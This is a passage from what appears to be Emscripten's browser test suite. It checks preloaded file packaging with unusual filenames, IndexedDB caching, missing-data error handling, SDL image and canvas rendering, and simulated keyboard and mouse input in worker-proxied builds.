print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_test_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_test_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_test_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_test_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = path_from_root('tests/manual_download_data.cpp')
create_test_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt')
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_test_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_test_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path)
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
ensure_dir(os.path.join('subdirr', 'moar'))
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_test_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
''')
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
''')
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_test_file('data.txt', 'data')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
''')
create_test_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
src = path_from_root('tests', 'sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
src, '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
src = path_from_root('tests', 'sdl_image.c')
self.compile_btest([
src, '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_test_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
@no_wasm_backend('This modifies JS code with regexes in such a way that does not currently work in WASM2JS')
def test_glgears_proxy(self):
# we modify the asm.js, this is a non-wasm test
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut', '-s', 'WASM=0'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates above test, but verifies we can run outside of the btest harness
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
def copy(to, js_mod, html_mod=lambda x: x):
create_test_file(to + '.html', html_mod(open('test.html').read().replace('test.js', to + '.js')))
create_test_file(to + '.js', js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_test_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def get_async_args(self):
return ['-s', 'ASYNCIFY']
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1'] + self.get_async_args()
]:
print(delay, defines, async_)
create_test_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([path_from_root('tests', 'sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_test_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([path_from_root('tests', 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([path_from_root('tests', 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
